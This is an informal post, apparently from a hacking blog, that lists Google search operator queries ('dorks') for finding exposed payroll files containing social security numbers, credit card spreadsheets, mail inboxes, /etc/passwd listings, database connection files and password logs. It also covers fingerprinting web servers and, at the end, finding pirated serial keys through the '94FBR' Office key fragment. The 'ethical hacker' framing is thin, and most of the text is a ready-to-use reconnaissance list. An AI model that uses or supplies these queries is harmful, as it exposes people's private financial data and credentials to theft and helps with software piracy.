Google Search Hacking Contd... II

But the Question rises What can Google can do for an Ethical Hacker?
Search sensitive information like payroll, SIN, even the personal email box
Vulnerabilities scanner

Transparent proxy
So how bt if i tell u a different way to searchk lets do this type in the following statements n c d resultswe can only provide u the guidelines, now u need to implement ur Creativity to Keep it rolling.
http://rahulhackingarticles.wetpaint.com/
Salary
Salary filetype: xls site: edu
Security social insurance number
Intitle: Payroll intext: ssn filetype: xls site: edu
Security Social Insurance Number
Payroll intext: Employee intext: ssn Filetype: xlsFiletype: xls "checking account" "credit card" - intext: Application -intext: Form (only 39 results)
Financial Information
Intitle: "Index of" finances.xls (9)
Personal Mailbox
Intitle: Index.of inurl: Inbox (inurl: User OR inurl: Mail) (220)
Confidential Files
"not for distribution" confidential (1,760)Confidential Files"not for distribution" confidential filetype: pdf (marketing info) (456)
OS Detection
Use the keywords of the default installation page of a Web server to search.
Use the title to search
Use the footer in a directory index page
OS Detection-Windows"Microsoft-IIS/5.0 server at"OS Detection - WindowsDefault web page?Intitle: "Welcome to Windows 2000 Internet Services" IIS 5.0OS Detection –Apache 1.3.11-1.3.26Intitle: Test.Page.for.Apache seeing.this.insteadOS Detection-Apache SSL enableIntitle: Test.page "SSL/TLS-aware" (127)
Search Passwords
Search the well known password filenames in URLSearch the database connection files or configuration files to find a password and usernameSearch specific username file for a specific product
Search Passwords
Inurl: etc inurl: passwd
Search Passwords
Intitle: "Index of..etc" passwd
Search Passwords
Intitle: "Index of..etc" passwd
Search Passwords
Inurl: admin.pwd filetype: pwd
Search Passwords
Filetype: inc dbconn
Search Passwords
Filetype: inc intext: mysql_connect
Search Passwords
Filetype: ini +ws_ftp +pwd (get the encrypted passwords)
Search Passwords
Filetype: log inurl: "password.log"Search Username+intext: "webalizer" +intext: "Total Usernames" +intext: "Usage Statistics for"License KeyFiletype: lic lic intext: key (33) (license key)Sensitive Directories ListingPowerful buzz word: Index of Search the well known vulnerable directories namesSensitive Directories Listing"index of cgi-bin" (3590)Sensitive Directories ListingIntitle: "Index of" cfide (coldfusion directory)Sensitive Directories ListingIntitle: index.of.winnt
Get the serial number you need ! (For Certain Things)
1) Go to Google. 2) Use Keyword as "Product name" 94FBR 3) Where, "Product Name" is the name of the item you want to find the serial number for. 4) And voila - there you go - the serial number you needed. HOW DOES THIS WORK? Quite simple really. 94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2K Pro. By searching for the product name and 94fbr, you guarantee two things. 1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for. 2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page. See these example searches:
Code:
"Photoshop 7"+94FBR "Age of Mythology"+94FBR "Nero Burning Rom 5.5"+94FBR